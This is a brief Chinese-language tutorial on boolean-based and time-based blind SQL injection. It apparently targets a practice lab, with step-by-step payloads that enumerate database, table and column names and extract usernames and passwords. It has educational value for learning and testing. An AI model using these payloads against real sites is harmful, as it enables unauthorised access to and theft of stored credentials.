布林型盲注 時間型盲注

布林型盲注核心思想： 利用判斷語句杢證明推測是否正確。 推測正確時，頁面正常顯示；錯誤時，頁面異常。

盲注的一般步驟：

1、求閉合字元；2、求當前資料庫名的長度；3、求當前資料庫名對應的ascii值；4、求表的數量；5、求表名的長度；6、求表名對應的ascii值；7、求列的數量；8、求列名的長度；9、求列名對應的ascii值；10、求欄位的數量；11、求欄位內容的長度；12、求欄位內容對應的ascii值。

求資料庫的長度  ?id=1' and length(database())=8 %23

求資料庫名ascii值  ?id=1' and ascii(substr(database(),1,1))=115 %23

求表的數量  id=1' and (select count(table_name) from information_schema.tables where table_schema='security') = 4 %23

求表名的ascii值  id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 %23

求列的數量  id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3 %23

求列名的ascii值  id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),1,1))=105 %23

求欄位的數量  id=1' and (select count(username) from security.users)=13 %23

求欄位內容  id=1' and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68 %23

 

 

時間型盲注 特點：頁面不存在異常，且即無回顯也無報錯資訊 利用：只能利用條件語句結合執行時間的長短杢判斷payload是否正確

後臺程式碼：
select id, username,password from users where id = '$id' limit 0,1;
輸入id：1' and if(length(database())>10,sleep(0),sleep(5)) %23
select id, username,password from users where id = '1' and if(length(database())>10,sleep(0),sleep(5)) %23' limit 0,1;
等同：
輸入id：1' and sleep(if(length(database())>10,0,5)) %23